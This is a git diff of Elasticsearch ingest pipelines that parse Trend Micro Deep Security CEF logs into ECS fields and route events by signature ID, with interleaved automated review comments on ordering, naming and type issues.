ignore_empty_value: true + - rename: + field: cef.extensions.serial + tag: rename_extensions_serial + target_field: trendmicro.deep_security.serial + ignore_missing: true + - rename: + field: cef.extensions.sourceUserId + tag: rename_extensions_sourceUserId + target_field: trendmicro.deep_security.source.user_id + ignore_missing: true + - set: + field: source.user.id + tag: set_source_user_id_from_deep_security_source_user_id + copy_from: trendmicro.deep_security.source.user_id + ignore_empty_value: true + - append: + field: related.user + tag: append_source_user_id_to_related_user + value: '{{{source.user.id}}}' + allow_duplicates: false + if: ctx.source?.user?.id != null - convert: - field: trendmicro.event.signature_id - 
type: integer + field: cef.extensions.xff + tag: convert_extensions_xff_to_ip + target_field: trendmicro.deep_security.xff + type: ip ignore_missing: true + if: ctx.cef?.extensions?.xff != '' on_failure: - - remove: - field: trendmicro.event.signature_id - ignore_missing: true - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' - + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: related.ip + tag: append_xff_to_related_ip + value: '{{{trendmicro.deep_security.xff}}}' + allow_duplicates: false + if: ctx.trendmicro?.deep_security?.extensions?.xff != null # pipeline per signature id - pipeline: name: '{{ IngestPipeline "application-control-event" }}' - if: "ctx.trendmicro?.event?.signature_id >= 6000000 && ctx.trendmicro?.event?.signature_id <= 6999999" + tag: pipeline_application_control_event + if: ctx.trendmicro?.deep_security?.signature_id >= 6000000 && ctx.trendmicro.deep_security.signature_id <= 6999999 - pipeline: name: '{{ IngestPipeline "firewall-event" }}' - if: "ctx.trendmicro?.event?.signature_id == 20 || ctx.trendmicro?.event?.signature_id == 21" + tag: pipeline_firewall_event + if: ctx.trendmicro?.deep_security?.signature_id == 20 || ctx.trendmicro.deep_security.signature_id == 21 - pipeline: name: '{{ IngestPipeline "intrusion-prevention-event" }}' - if: "ctx.trendmicro?.event?.signature_id == 10 || (ctx.trendmicro?.event?.signature_id >= 1000000 && ctx.trendmicro?.event?.signature_id <= 1999999)" + tag: pipeline_intrusion_prevention_event + if: ctx.trendmicro?.deep_security?.signature_id == 10 || (ctx.trendmicro.deep_security.signature_id >= 1000000 && ctx.trendmicro.deep_security.signature_id <= 1999999) - pipeline: name: '{{ IngestPipeline "integrity-monitoring-event" }}' - if: "ctx.trendmicro?.event?.signature_id == 30 || 
(ctx.trendmicro?.event?.signature_id >= 2000000 && ctx.trendmicro?.event?.signature_id <= 2999999)" + tag: pipeline_integrity_monitoring_event + if: ctx.trendmicro?.deep_security?.signature_id == 30 || (ctx.trendmicro.deep_security.signature_id >= 2000000 && ctx.trendmicro.deep_security.signature_id <= 2999999) - pipeline: name: '{{ IngestPipeline "malware-event" }}' - if: "ctx.trendmicro?.event?.signature_id >= 4000000 && ctx.trendmicro?.event?.signature_id <= 4999999" + tag: pipeline_malware_event + if: ctx.trendmicro?.deep_security?.signature_id >= 4000000 && ctx.trendmicro.deep_security.signature_id <= 4999999 - pipeline: name: '{{ IngestPipeline "system-event" }}' - if: "ctx.trendmicro?.event?.signature_id >= 100 && ctx.trendmicro?.event?.signature_id <= 7499" + tag: pipeline_system_event + if: ctx.trendmicro?.deep_security?.signature_id >= 100 && ctx.trendmicro.deep_security.signature_id <= 7499 - pipeline: name: '{{ IngestPipeline "log-inspection" }}' - if: "ctx.trendmicro?.event?.signature_id == 40 || (ctx.trendmicro?.event?.signature_id >= 3000000 && ctx.trendmicro?.event?.signature_id <= 3999999)" + tag: pipeline_log_inspection + if: ctx.trendmicro?.deep_security?.signature_id == 40 || (ctx.trendmicro.deep_security.signature_id >= 3000000 && ctx.trendmicro.deep_security.signature_id <= 3999999) - pipeline: name: '{{ IngestPipeline "web-reputation" }}' - if: "ctx.trendmicro?.event?.signature_id >= 5000000 && ctx.trendmicro?.event?.signature_id <= 5999999" - - - convert: - field: file.size - type: long - ignore_missing: true - on_failure: - - remove: - field: file.size - ignore_missing: true - - append: - field: error.message - value: '{{{_ingest.on_failure_message}}}' - - - remove: - field: - - cef - ignore_missing: true - # + tag: pipeline_web_reputation + if: ctx.trendmicro?.deep_security?.signature_id >= 5000000 && ctx.trendmicro.deep_security.signature_id <= 5999999 + - pipeline: + name: '{{ IngestPipeline "device-control-event" }}' + tag: 
pipeline_device_control_event + if: ctx.trendmicro?.deep_security?.signature_id >= 7000000 && ctx.trendmicro.deep_security.signature_id <= 7999999 # Timestamp parsing. - # - grok: # decode_cef sets @timestamp when deviceReceiptTime is provided. description: Extract timestamp from log header when deviceReceiptTime not given. + tag: grok_extract_timestamp if: ctx.cef?.extensions?.deviceReceiptTime == null field: event.original patterns: 
@@ -86,29 +865,132 @@ processors: ECS_SYSLOG_PRI: "<%{NONNEGINT:log.syslog.priority:long}>" SYSLOG_TIMESTAMP: "(?:%{SYSLOGTIMESTAMP:_tmp.timestamp}|%{TIMESTAMP_ISO8601:_tmp.timestamp8601})" - date: - if: ctx._tmp?.timestamp8601 != null field: _tmp.timestamp8601 + tag: date_tmp_timestamp8601 + if: ctx._tmp?.timestamp8601 != null && ctx.event?.timezone == null formats: - ISO8601 + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - date: - if: ctx._tmp?.timestamp != null field: _tmp.timestamp + tag: date_tmp_timestamp + if: ctx._tmp?.timestamp != null && ctx.event?.timezone == null formats: - MMM d HH:mm:ss - MMM dd HH:mm:ss + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: _conf.tz_offset + target_field: event.timezone + if: ctx._conf?.tz_offset != null + tag: 'rename_tz_offset' + ignore_missing: true + - date: + field: _tmp.timestamp8601 + tag: date_tmp_timestamp8601_tz + timezone: '{{{event.timezone}}}' + if: ctx._tmp?.timestamp8601 != null && ctx.event?.timezone != null + formats: + - ISO8601 + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: _tmp.timestamp + tag: date_tmp_timestamp_tz + timezone: '{{{event.timezone}}}' + if: ctx._tmp?.timestamp != null && ctx.event?.timezone != null + formats: + - MMM d HH:mm:ss + - MMM dd HH:mm:ss + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with 
tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - remove: field: - - _tmp + - trendmicro.deep_security.filename + - trendmicro.deep_security.source.host_name + - trendmicro.deep_security.event_class_id + - trendmicro.deep_security.device.product + - trendmicro.deep_security.device.vendor + - trendmicro.deep_security.device.version + - trendmicro.deep_security.bytes_in + - trendmicro.deep_security.destination.address + - trendmicro.deep_security.destination.mac_address + - trendmicro.deep_security.destination.port + - trendmicro.deep_security.device.custom_number1.value + - trendmicro.deep_security.deviceHostName + - trendmicro.deep_security.file_path + - trendmicro.deep_security.message + - trendmicro.deep_security.source.address + - trendmicro.deep_security.source.mac_address + - trendmicro.deep_security.source.port + - trendmicro.deep_security.source.user_name + - trendmicro.deep_security.transport_protocol + - trendmicro.deep_security.name + - trendmicro.deep_security.severity + - trendmicro.deep_security.destination.user_name + - trendmicro.deep_security.file.hash + - trendmicro.deep_security.file.size + - trendmicro.deep_security.process.name + - trendmicro.deep_security.source.user_id + - trendmicro.deep_security.request_url + - trendmicro.deep_security.trendmicro.ds_cve + - trendmicro.deep_security.trendmicro.ds_file.md5 + - trendmicro.deep_security.trendmicro.ds_file.sha1 + - trendmicro.deep_security.trendmicro.ds_file.sha256 + - trendmicro.deep_security.model + - trendmicro.deep_security.computer_name + - trendmicro.deep_security.trendmicro.ds_command_line + tag: remove_custom_duplicate_fields + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields')) + - remove: + field: + - _tmp + - cef + tag: remove_cef_and_tmp ignore_missing: true - remove: field: event.original - if: "ctx.tags == null || 
!(ctx.tags.contains('preserve_original_event'))" + tag: remove_event_original ignore_missing: true - -on_failure: - - set: + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + - script: + tag: script_to_drop_null_values + lang: painless + source: |- + boolean drop(Object object) { + if (object == null || object == '') { + return true; + } else if (object instanceof Map) { + ((Map) object).values().removeIf(v -> drop(v)); + return (((Map) object).size() == 0); + } else if (object instanceof List) { + ((List) object).removeIf(v -> drop(v)); + return (((List) object).length == 0); + } + return false; + } + drop(ctx); + description: Drops null/empty values recursively. + - append: field: event.kind value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: - append: field: error.message - value: '{{{ _ingest.on_failure_message }}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.kind + value: pipeline_error diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/device-control-event.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/device-control-event.yml new file mode 100644 index 00000000000..9bc659a7e57 --- /dev/null +++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/device-control-event.yml 
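Review bot: The `rename_tz_offset` processor runs after the two date processors guarded by `ctx.event?.timezone == null`, so when `_conf.tz_offset` is configured those guards are still true at that point (unless event.timezone is set earlier in the pipeline, outside this hunk): the timestamp is parsed once without a zone, then event.timezone is populated, then it is parsed again by `date_tmp_timestamp8601_tz`/`date_tmp_timestamp_tz`. A failure in the first, zone-less parse also leaves a spurious `error.message` and `pipeline_error` kind on an event whose zoned parse then succeeds. Moving the `_conf.tz_offset` rename above `date_tmp_timestamp8601` makes the four guards mutually exclusive as written. Separately, the trailing `append` of `pipeline_error` to `event.kind` turns the field into an array whenever an earlier processor already set it (the malware sub-pipeline in this commit sets `alert`); the `set` form used in the `on_failure` block avoids that.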
@@ -0,0 +1,24 @@
+---
+description: Pipeline for processing Application Control event logs.
+processors:
+ - set:
+ field: trendmicro.deep_security.event_category
+ tag: set_deep_security_event_category
+ value: device-control-event
+ - append:
+ field: event.category
+ tag: set_event_category
+ value: intrusion_detection
+ allow_duplicates: false
+ - append:
+ field: event.type
+ tag: set_event_type
+ value: info
+ allow_duplicates: false
+on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - set:
+ field: event.kind
+ value: pipeline_error
diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/firewall-event.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/firewall-event.yml
index 9f66a5a2ff3..4d1a03dbeb8 100644
--- a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/firewall-event.yml
+++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/firewall-event.yml
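Review bot: The description on the new device-control pipeline reads `Pipeline for processing Application Control event logs.`, a copy from the application-control pipeline; it should be `description: Pipeline for processing Device Control event logs.`. The `append` processors here carry tags named `set_event_category`/`set_event_type`, and the same naming is used on the `append` processors in the firewall-event, integrity-monitoring-event and intrusion-prevention-event hunks, while system-event uses `append_event_category`; since the on-failure messages print the tag, one convention (`append_*` for append processors) keeps them readable. Whether `intrusion_detection` is the right ECS event.category for device-control events is not something the hunk establishes, so a short comment stating why that category was chosen would help the next reader.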
@@ -2,87 +2,23 @@ description: Pipeline for processing Firewall event logs processors: - set: - field: trendmicro.event.category - value: "firewall" - - set: + field: trendmicro.deep_security.event_category + tag: set_deep_security_event_category + value: firewall-event + - append: field: event.category - value: ["network"] - - set: + tag: set_event_category + value: network + allow_duplicates: false + - append: field: event.type - value: ["info"] - - - script: - lang: painless - params: - extensions: - # Rename field - - name: deviceCustomNumber1 - to: host.id - - name: baseEventCount - to: trendmicro.event.count - - name: deviceCustomString2 - to: trendmicro.event.tcp_flag - - name: deviceCustomString3 - to: trendmicro.event.packet_fragmentation - - name: TrendMicroDsTags - to: trendmicro.event.tags - - name: TrendMicroDsTenantId - to: trendmicro.event.tenant_id - - name: TrendMicroDsTenant - to: trendmicro.event.tenant_name - - name: deviceAddress - to: host.ip - - name: deviceHostName - to: host.hostname - - name: TrendMicroDsFrameType - to: trendmicro.event.ethernet_frame_type - - name: TrendMicroDsPacketData - to: trendmicro.event.packet_data - - source: | - def actions = new ArrayList(); - def exts = ctx.cef?.extensions; - if (exts == null) return; - for (entry in params.extensions) { - def value = exts[entry.name]; - if (value == null || - (entry.convert != null && - (value=entry.convert[value.toLowerCase()]) == null)) - continue; - if (entry.to != null) { - actions.add([ - "value": value, - "to": entry.to - ]); - continue; - } - def label = exts[entry.name + "Label"]; - if (label == null) continue; - def dest = entry.labels[label.toLowerCase()]; - if (dest == null) continue; - actions.add([ - "value": value, - "to": dest - ]); - } - ctx["_tmp_copy"] = actions; - - foreach: - field: _tmp_copy - processor: - set: - field: "{{_ingest._value.to}}" - value: "{{_ingest._value.value}}" - ignore_empty_value: true - - - remove: - field: - - _tmp_copy - 
ignore_missing: true - + tag: set_event_type + value: info + allow_duplicates: false on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: event.kind value: pipeline_error - - append: - field: error.message - value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/integrity-monitoring-event.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/integrity-monitoring-event.yml index 20909e79e49..f7590f97d9a 100644 --- a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/integrity-monitoring-event.yml +++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/integrity-monitoring-event.yml 
@@ -2,75 +2,23 @@ description: Pipeline for processing Integrity Monitoring event logs processors: - set: - field: trendmicro.event.category - value: "integrity-monitor" - - set: + field: trendmicro.deep_security.event_category + tag: set_deep_security_event_category + value: integrity-monitoring-log-event + - append: field: event.category - value: ["configuration"] - - set: + tag: set_event_category + value: configuration + allow_duplicates: false + - append: field: event.type - value: ["info"] - - - script: - lang: painless - params: - extensions: - # Rename field - - name: deviceCustomNumber1 - to: host.id - - name: deviceHostName - to: host.hostname - - name: oldFilePath - to: trendmicro.event.old_file_path - - name: TrendMicroDsTags - to: trendmicro.event.tags - - name: TrendMicroDsTenantId - to: trendmicro.event.tenant_id - - name: TrendMicroDsTenant - to: trendmicro.event.tenant_name - - source: | - def actions = new ArrayList(); - def exts = ctx.cef?.extensions; - if (exts == null) return; - for (entry in params.extensions) { - def value = exts[entry.name]; - if (value == null || - (entry.convert != null && - (value=entry.convert[value.toLowerCase()]) == null)) - continue; - if (entry.to != null) { - actions.add([ - "value": value, - "to": entry.to - ]); - continue; - } - def label = exts[entry.name + "Label"]; - if (label == null) continue; - def dest = entry.labels[label.toLowerCase()]; - if (dest == null) continue; - actions.add([ - "value": value, - "to": dest - ]); - } - ctx["_tmp_copy"] = actions; - - foreach: - field: _tmp_copy - processor: - set: - field: "{{_ingest._value.to}}" - value: "{{_ingest._value.value}}" - - - remove: - field: - - _tmp_copy - + tag: set_event_type + value: info + allow_duplicates: false on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: 
{{{_ingest.on_failure_message}}}' - set: field: event.kind value: pipeline_error - - append: - field: error.message - value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/intrusion-prevention-event.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/intrusion-prevention-event.yml index 0b8200330d5..b9cf04e2b78 100644 --- a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/intrusion-prevention-event.yml +++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/intrusion-prevention-event.yml 
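Review bot: The `trendmicro.deep_security.event_category` value `integrity-monitoring-log-event` follows neither the pattern of the sibling pipelines in this commit (`firewall-event`, `intrusion-prevention-event`, `device-control-event`, `system-event`) nor this pipeline's own name; if the extra `log` is not deliberate, the line should be `value: integrity-monitoring-event`. This field is presumably what dashboards and detection rules filter on, so an inconsistent value is easy to miss now and costly to change once data has been indexed.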
@@ -2,89 +2,23 @@ description: Pipeline for processing Intrusion Prevention event logs processors: - set: - field: trendmicro.event.category - value: "intrusion-prevention" - - set: + field: trendmicro.deep_security.event_category + tag: set_deep_security_event_category + value: intrusion-prevention-event + - append: field: event.category - value: ["intrusion_detection"] - - set: + tag: set_event_category + value: intrusion_detection + allow_duplicates: false + - append: field: event.type - value: ["info"] - - - script: - lang: painless - params: - extensions: - # Rename field - - name: deviceCustomNumber1 - to: host.id - - name: deviceHostName - to: host.hostname - - name: TrendMicroDsFrameType - to: trendmicro.event.ethernet_frame_type - - name: deviceCustomString5 - to: trendmicro.event.ips_stream_position - - name: baseEventCount - to: trendmicro.event.count - - name: deviceCustomNumber3 - to: trendmicro.event.ips_packet_position - - name: TrendMicroDsPacketData - to: trendmicro.event.packet_data - - name: deviceCustomString2 - to: trendmicro.event.tcp_flag - - name: deviceCustomString6 - to: trendmicro.event.ips_flag - - name: deviceCustomString3 - to: trendmicro.event.packet_fragmentation - - name: TrendMicroDsTags - to: trendmicro.event.tags - - name: TrendMicroDsTenantId - to: trendmicro.event.tenant_id - - name: TrendMicroDsTenant - to: trendmicro.event.tenant_name - - source: | - def actions = new ArrayList(); - def exts = ctx.cef?.extensions; - if (exts == null) return; - for (entry in params.extensions) { - def value = exts[entry.name]; - if (value == null || - (entry.convert != null && - (value=entry.convert[value.toLowerCase()]) == null)) - continue; - if (entry.to != null) { - actions.add([ - "value": value, - "to": entry.to - ]); - continue; - } - def label = exts[entry.name + "Label"]; - if (label == null) continue; - def dest = entry.labels[label.toLowerCase()]; - if (dest == null) continue; - actions.add([ - "value": value, - "to": dest - ]); - } 
- ctx["_tmp_copy"] = actions; - - foreach: - field: _tmp_copy - processor: - set: - field: "{{_ingest._value.to}}" - value: "{{_ingest._value.value}}" - - - remove: - field: - - _tmp_copy - + tag: set_event_type + value: info + allow_duplicates: false on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: event.kind value: pipeline_error - - append: - field: error.message - value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/log-inspection.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/log-inspection.yml index a3ebe1385a2..c619e7a082f 100644 --- a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/log-inspection.yml +++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/log-inspection.yml 
@@ -2,75 +2,13 @@ description: Pipeline for Log Inspection events processors: - set: - field: trendmicro.event.category - value: "log-inspection" - - set: - field: event.category - value: ["package"] - - set: - field: event.type - value: ["info"] - - - script: - lang: painless - params: - extensions: - # Rename field - - name: deviceCustomNumber1 - to: host.id - - name: deviceCustomString1 - to: trendmicro.event.log_inspection_description - - name: deviceAddress - to: host.ip - - name: deviceHostName - to: host.hostname - - name: TrendMicroDsTags - to: trendmicro.event.tags - - name: TrendMicroDsTenantId - to: trendmicro.event.tenant_id - - name: TrendMicroDsTenant - to: trendmicro.event.tenant_name - - source: | - def actions = new ArrayList(); - def exts = ctx.cef?.extensions; - if (exts == null) return; - for (entry in params.extensions) { - def value = exts[entry.name]; - if (value == null || - (entry.convert != null && - (value=entry.convert[value.toLowerCase()]) == null)) - continue; - if (entry.to != null) { - actions.add([ - "value": value, - "to": entry.to - ]); - continue; - } - def label = exts[entry.name + "Label"]; - if (label == null) continue; - def dest = entry.labels[label.toLowerCase()]; - if (dest == null) continue; - actions.add([ - "value": value, - "to": dest - ]); - } - ctx["_tmp_copy"] = actions; - - foreach: - field: _tmp_copy - processor: - set: - field: "{{_ingest._value.to}}" - value: "{{_ingest._value.value}}" - - remove: - field: - - _tmp_copy + field: trendmicro.deep_security.event_category + tag: set_deep_security_event_category + value: log-inspection-event on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: event.kind value: pipeline_error - - append: - field: error.message - value: '{{{ _ingest.on_failure_message 
}}}' diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/malware-event.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/malware-event.yml index 474daff90ed..0297d9ac601 100644 --- a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/malware-event.yml +++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/malware-event.yml 
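Review bot: The new side of the log-inspection pipeline sets only `trendmicro.deep_security.event_category`; the `event.category` and `event.type` assignments the old side had are removed and, unlike the other sub-pipelines in this commit, nothing here replaces them. If the default pipeline (outside this hunk) now assigns ECS categorization for log-inspection events, a one-line comment saying so would stop the next reader from treating this as an omission; otherwise add `append` processors for `event.category` and `event.type` as the sibling pipelines do.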
@@ -2,119 +2,29 @@ description: Pipeline for processing Anti-Malware event logs processors: - set: - field: trendmicro.event.category - value: "anti-malware" - - set: - field: event.category - value: ["malware"] - - set: - field: event.type - value: ["info"] + field: trendmicro.deep_security.event_category + tag: set_deep_security_event_category + value: anti-malware-event - script: lang: painless - params: - extensions: - # Rename field - - name: deviceCustomNumber2 - to: file.size - - name: deviceCustomNumber1 - to: host.id - - name: deviceHostName - to: host.hostname - - name: deviceAddress - to: host.ip - - name: TrendMicroDsFileMD5 - to: file.hash.md5 - - name: TrendMicroDsFileSHA1 - to: file.hash.sha1 - - name: TrendMicroDsFileSHA256 - to: file.hash.sha256 - - name: TrendMicroDsRelevantDetectionNames - to: trendmicro.event.probable_threat_type - - name: TrendMicroDsMalwareTarget - to: trendmicro.event.malware_target - - name: TrendMicroDsMalwareTargetType - to: trendmicro.event.malware_target_type - - name: deviceCustomString6 - to: container.image.name - - name: TrendMicroDsDetectionConfidence - to: trendmicro.event.threat_probability - - name: TrendMicroDsTags - to: trendmicro.event.tags - - name: TrendMicroDsTenantId - to: trendmicro.event.tenant_id - - name: TrendMicroDsTenant - to: trendmicro.event.tenant_name - - name: deviceCustomString5 - to: trendmicro.event.spyware_risklevel - convert: - "0": Very Low - "25": Low - "50": Medium - "75": High - "100": Very High - - name: deviceCustomString4 - to: trendmicro.event.spyware_resourcetype - convert: - "10": Files and Directories - "11": System Registry - "12": Internet Cookies - "13": Internet URL Shortcut - "14": Programs in Memory - "15": Program Startup Areas - "16": Browser Helper Object - "17": Layered Service Provider - "18": Hosts File - "19": Windows Policy Settings - "20": Browser - "23": Windows Shell Setting - "24": IE Downloaded Program Files - "25": Add/Remove Programs - "26": Services - 
"other": Other - - source: | - def actions = new ArrayList(); - def exts = ctx.cef?.extensions; - if (exts == null) return; - for (entry in params.extensions) { - def value = exts[entry.name]; - if (value == null || - (entry.convert != null && - (value=entry.convert[value.toLowerCase()]) == null)) - continue; - if (entry.to != null) { - actions.add([ - "value": value, - "to": entry.to - ]); - continue; - } - def label = exts[entry.name + "Label"]; - if (label == null) continue; - def dest = entry.labels[label.toLowerCase()]; - if (dest == null) continue; - actions.add([ - "value": value, - "to": dest - ]); + tag: script_to_set_ecs_categorization_in_malware_pipeline + description: Script to set ECS categorizations. + if: ctx.trendmicro?.deep_security?.signature_id != null + source: >- + def signatureIds = [4000000L, 4000001L, 4000002L, 4000003L, 4000010L, 4000011L, 4000012L, 4000013L, 4000020L, 4000030L]; + if (signatureIds.contains(ctx.trendmicro.deep_security.signature_id)) { + ctx.event.category = ["malware"]; + ctx.event.kind = "alert"; + ctx.event.type = ["info"]; } - ctx["_tmp_copy"] = actions; - - foreach: - field: _tmp_copy - processor: - set: - field: "{{_ingest._value.to}}" - value: "{{_ingest._value.value}}" - - - remove: - field: - - _tmp_copy - + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: event.kind value: pipeline_error - - append: - field: error.message - value: '{{{ _ingest.on_failure_message }}}' 
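Review bot: `signatureIds.contains(ctx.trendmicro.deep_security.signature_id)` in the new script compares with `equals`, and the list holds `Long` values (`4000000L`), so it returns false if `signature_id` reaches this pipeline as an `Integer` (the old side converted it with `type: integer`; how the new default pipeline converts it is outside this hunk). The pipeline-routing `if` conditions use `>=`/`<=`, which coerce across numeric types, so such a mismatch would only surface here as silently missing `event.category`/`event.kind`. Either convert `signature_id` to `long` upstream and say so in a comment, or compare numerically, e.g. `long id = ((Number) ctx.trendmicro.deep_security.signature_id).longValue();` before the `contains`. The script also dereferences `ctx.event` without a null check, which is fine only if an earlier processor always creates `event`.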
diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/system-event.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/system-event.yml index a0a76632fd9..6c95b3f137b 100644 --- a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/system-event.yml +++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/system-event.yml 
@@ -2,75 +2,30 @@ description: Pipeline for processing System event logs processors: - set: - field: trendmicro.event.category - value: "system" - - set: + field: trendmicro.deep_security.event_category + tag: set_deep_security_event_category + value: system-event + - append: field: event.category - value: [malware,threat] - - set: + tag: append_event_category + value: authentication + allow_duplicates: false + if: ctx.trendmicro?.deep_security?.signature_id == 397 || ctx.trendmicro?.deep_security?.signature_id == 160 + - append: field: event.type - value: [info] - - - script: - lang: painless - params: - extensions: - # Rename field - - name: target - to: trendmicro.event.target - - name: targetID - to: trendmicro.event.target_id - - name: targetType - to: trendmicro.event.target_type - - name: TrendMicroDsTags - to: trendmicro.event.tags - - name: TrendMicroDsTenantId - to: trendmicro.event.tenant_id - - name: TrendMicroDsTenant - to: trendmicro.event.tenant_name - - source: | - def actions = new ArrayList(); - def exts = ctx.cef?.extensions; - if (exts == null) return; - for (entry in params.extensions) { - def value = exts[entry.name]; - if (value == null || - (entry.convert != null && - (value=entry.convert[value.toLowerCase()]) == null)) - continue; - if (entry.to != null) { - actions.add([ - "value": value, - "to": entry.to - ]); - continue; - } - def label = exts[entry.name + "Label"]; - if (label == null) continue; - def dest = entry.labels[label.toLowerCase()]; - if (dest == null) continue; - actions.add([ - "value": value, - "to": dest - ]); - } - ctx["_tmp_copy"] = actions; - - foreach: - field: _tmp_copy - processor: - set: - field: "{{_ingest._value.to}}" - value: "{{_ingest._value.value}}" - - - remove: - field: - - _tmp_copy - + tag: set_event_type + value: info + allow_duplicates: false + if: ctx.trendmicro?.deep_security?.signature_id == 397 || ctx.trendmicro?.deep_security?.signature_id == 160 + - set: + field: event.outcome + tag: 
set_event_outcome + value: failure + if: ctx.trendmicro?.deep_security?.signature_id == 397 || ctx.trendmicro?.deep_security?.signature_id == 160 on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: event.kind value: pipeline_error - - append: - field: error.message - value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/web-reputation.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/web-reputation.yml index d272be61229..2ddeb25ed60 100644 --- a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/web-reputation.yml +++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/web-reputation.yml 
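Review bot: The condition `ctx.trendmicro?.deep_security?.signature_id == 397 || ctx.trendmicro?.deep_security?.signature_id == 160` is repeated verbatim on the three new processors tagged `append_event_category`, `set_event_type` and `set_event_outcome`, so a later change to the id set applied to only one of them would leave category, type and outcome disagreeing for the same event. Folding the three assignments into one conditional script processor, or at minimum a comment above the first one stating what 397 and 160 denote (presumably failed sign-in system events — that is not verifiable from the hunk), would make the coupling explicit. The tag `set_event_type` sits on an `append` processor; `tag: append_event_type` would match `append_event_category` and the processor type the new on_failure message reports.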
